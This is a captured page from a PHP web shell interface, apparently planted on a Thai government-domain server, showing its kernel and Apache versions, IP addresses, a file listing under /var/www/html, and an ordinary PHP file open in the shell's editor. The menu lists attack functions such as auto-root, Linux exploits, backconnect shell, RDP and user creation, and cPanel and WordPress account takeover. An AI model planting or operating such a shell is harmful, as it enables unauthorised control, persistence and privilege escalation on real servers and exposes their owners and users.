Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
smss /
[ HOME SHELL ]
Name
Size
Permission
Action
function.php
632
B
-rw-r--r--
insert_sync.php
1.96
KB
-rw-r--r--
sync.php
7.29
KB
-rw-r--r--
time_alert.php
549
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : time_alert.php
<?php header("Content-type:text/xml; charset=UTF-8"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); echo "<?xml version='1.0' encoding='UTF-8'?>"; $remote_com = $_GET['serv']; $pieces = explode(".", $remote_com); $sum_pieces=1; foreach($pieces as $key => $val) { $sum_pieces=$sum_pieces+$val; } $time_now=time(); $time_now2=$time_now*$sum_pieces; ?> <info> <time><?php echo $time_now2;?></time> </info>
Close